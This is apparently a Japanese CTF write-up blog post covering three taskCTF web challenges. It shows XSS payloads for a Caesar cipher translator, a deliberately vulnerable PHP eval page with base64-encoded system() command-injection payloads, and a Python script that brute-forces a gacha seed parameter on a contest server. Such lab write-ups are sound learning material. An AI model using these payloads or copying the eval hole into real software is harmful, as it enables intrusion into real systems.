kanyewest CTF

勉強したことをメモしています。

taskCTF: Write up

Web

Caesar Cipher Translator

"><script>alert("TEST");</script>と入力すると

f:id:tekashi:20201206121652p:plain

f:id:tekashi:20201206121626p:plain

"><fpevcg>nyreg("vawrpgrq");</fpevcg>

<script>タグ使わない方法ということで "><img src=1 onerror='alert("injected")'/>

f:id:tekashi:20201206161204p:plain

f:id:tekashi:20201206161121p:plain

flag: taskctf{n1ce_inject10n!}

Evil Eval

<?php
$result = "";
    if (isset($_GET['data'])) {
        $data = $_GET['data'];
        $raw = base64_decode($data);
        eval('$result = ' . $raw . ';');
    }
?>
<html>
<head>
    <meta charset="utf-8">
    <title>result</title>
</head>
<body>
    <h1>結果</h1>
    <p><?= $result ?></p>
</body>
</html>
$ echo -n 'system("ls");' | base64
c3lzdGVtKCJscyIpOw==
$ echo -n 'system("cat flag.txt");' | base64
c3lzdGVtKCJjYXQgZmxhZy50eHQiKTs=

f:id:tekashi:20201206120927p:plain

flag: taskctf{eval_1s_b4d_h4bit}

Gacha

func gachaHandler(w http.ResponseWriter, r *http.Request) {
    seed := r.FormValue("seed")
    if len(seed) == 0 {
        seed = "1"
    }
    seedInt, err := strconv.Atoi(seed)
    if err != nil {
        http.Error(w, err.Error(), http.StatusInternalServerError)
        return
    }

    // get current time(HHmmss)
    jst := time.FixedZone("Asia/Tokyo", 9*60*60)
    nowStr := time.Now().In(jst).Format("150405")
    log.Println(nowStr)
    nowInt, err := strconv.Atoi(nowStr)
    if err != nil {
        http.Error(w, err.Error(), http.StatusInternalServerError)
        return
    }

    sm := (seedInt + nowInt) % 100000
    log.Println(sm)
    var flag map[string]string

    if sm == 1337 {
        flag = map[string]string{
            "flag": "taskctf{this_is_dummy_flag}",
        }
    }

与えられたファイルを読むと(seedInt + nowInt) % 100000が1337になればflagが出てくる。 またseeed値はユーザが勝手に設定できるっぽい。

適当にスクリプト書いて総当りしてたらflag出てきた。

import requests

url = "http://34.82.49.144:3334/?seed="

for i in range(177770,10000000):
    tmp = url + str(i)
    print("url: ",tmp) 
    res = requests.get(url=tmp)
    print(res.text)
{"flag":"You might not have a luck...","sum":"1329"}
url:  http://34.82.49.144:3334/?seed=177785
{"flag":"You might not have a luck...","sum":"1330"}
url:  http://34.82.49.144:3334/?seed=177786
{"flag":"You might not have a luck...","sum":"1332"}
url:  http://34.82.49.144:3334/?seed=177787
{"flag":"You might not have a luck...","sum":"1333"}
url:  http://34.82.49.144:3334/?seed=177788
{"flag":"You might not have a luck...","sum":"1334"}
url:  http://34.82.49.144:3334/?seed=177789
{"flag":"You might not have a luck...","sum":"1335"}
url:  http://34.82.49.144:3334/?seed=177790
{"flag":"taskctf{Y0u_h4ve_4_gre4t_luck}"}

flag: taskctf{Y0u_h4ve_4_gre4t_luck}